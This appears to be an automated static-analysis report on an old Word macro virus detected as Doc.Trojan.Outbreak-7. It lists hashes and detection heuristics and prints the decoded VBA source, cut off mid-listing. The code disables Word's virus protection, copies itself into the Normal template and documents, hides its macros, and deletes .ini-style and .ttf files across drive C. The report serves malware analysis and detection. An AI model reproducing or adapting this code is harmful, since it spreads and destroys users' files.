Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31fac7bbea8ae66d…

MALICIOUS

Office (OLE)

47.0 KB Created: 1995-03-05 04:47:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 25face37bdab1a64de28189ad77f43c4 SHA-1: 4ab37f4f111cb3fcfc56f1b8cd60b05683ed9625 SHA-256: 31fac7bbea8ae66d720583df2c1fd6937c30da0694ab602dd1aa1552974ed22a
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits characteristics of legacy WordBasic macro viruses and contains VBA macros, including AutoOpen and AutoClose functions, which are often used to execute malicious code upon document interaction. The presence of 'OutBreak!' in the document body and ClamAV detections further support its malicious nature. The VBA script attempts to interact with a file named 'c:\command.log', suggesting a potential command and control or staging mechanism.

Heuristics 5

  • ClamAV: Doc.Trojan.Outbreak-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Outbreak-7
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6754 bytes
SHA-256: 896f27c4647bc6c9df56a49b977647016291e2b1aa3d06c5f9b3f9b9935f2446
Detection
ClamAV: Doc.Trojan.Outbreak-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "OutBreak"
Sub AutoClose()
Attribute AutoClose.VB_Description = "¥¨¶°«Ø¥ß©ó 98/??/??¡A«Ø¥ßªÌ OutBreak"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.OutBreak.AutoClose"

Dim EPOLA
On Error Resume Next


Options.VirusProtection = _
False
Set activedoc = _
ActiveDocument
Set GlobalDoc = _
NormalTemplate
   

 Application.OrganizerCopy Source:=NormalTemplate.FullName, _
 Destination:=ActiveDocument.FullName, Name:="OutBreak", _
 Object:=wdOrganizerObjectProjectItems
 activedoc.SaveAs , fileformat:=wdFormatTemplate
 Options.SavePropertiesPrompt = False
   
   
 Application.OrganizerCopy Source:=ActiveDocument.FullName, _
 Destination:=NormalTemplate.FullName, Name:="OutBreak", _
 Object:=wdOrganizerObjectProjectItems
 Options.SaveNormalPrompt = False


EPOLA = _
Int(Rnd() * 20) + 1
If EPOLA > 18 Then
WordBasic.Call "VIRUS"
WordBasic.Call "VIRUS2"
End If
exit_:

End Sub
Sub AutoExec()
Dim Wri$
On Error Resume Next

Open "c:\command.log" For Input As 1
Input #1, Wri$
Close 1

If Wri$ = "MoTaBa-J" Then
WordBasic.Call "VIRUS1"
WordBasic.Call "VIRUS3"
End If

If Wri$ = "" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-A"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-A" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-B"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-B" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-C"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-C" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-D"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-D" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-E"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-E" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-F"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-F" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-G"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-G" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-H"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-H" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-I"
Close 1
GoTo exit_
End If

If Wri$ = "MoTaBa-I" Then
Open "c:\command.log" For Output As 1
Print #1, "MoTaBa-J"
Close 1
GoTo exit_
End If

exit_:

End Sub
Sub AutoOpen()
   
WordBasic.Call "VIRUS4"
WordBasic.Call "VIRUS5"
   
Options.VirusProtection = _
False
Set activedoc = _
ActiveDocument
Set GlobalDoc = _
NormalTemplate
     
 Application.OrganizerCopy Source:=ActiveDocument.FullName, _
 Destination:=NormalTemplate.FullName, Name:="OutBreak", _
 Object:=wdOrganizerObjectProjectItems
 Options.SaveNormalPrompt = False

exit_:
End Sub
Sub FileTemplates()
AutoExec
Rem OutBreak
End Sub
Sub ViewVBCode()
AutoExec
Rem OutBreak
End Sub
Sub ToolsCustomize()
Rem OutBreak
End Sub
Sub ToolsOptions()
Rem OutBreak
End Sub
Sub ToolsMacro()
AutoExec
Rem OutBreak
End Sub
Sub VIRUS()
On Error Resume Next

 With Application.FileSearch
        .Filename = "*.in?"
        .LookIn = "C:\"
        .SearchSubFolders = True
        .Execute
        If .FoundFiles.count <> 0 Then
            For I = 1 To .FoundFiles.count
            Kill .FoundFiles(I)
            'Beep
            Next I
        End If
    End With

End Sub
Sub VIRUS1()
On Error Resume Next

 With Application.FileSearch
        .Filename = "*.ttf"
        .LookIn = "C:\"
        .SearchSubFolders = True
        .Execute
        If .FoundFiles.count <> 0 Then
            For I = 1 To .FoundFiles.count
            Kill .FoundFiles(I)
            'Beep
            Next I
        End If
    End With
    
End Sub
Sub VIRUS2()
On Error Resume Next

 With Application.FileSearch
        .Filen
... (truncated)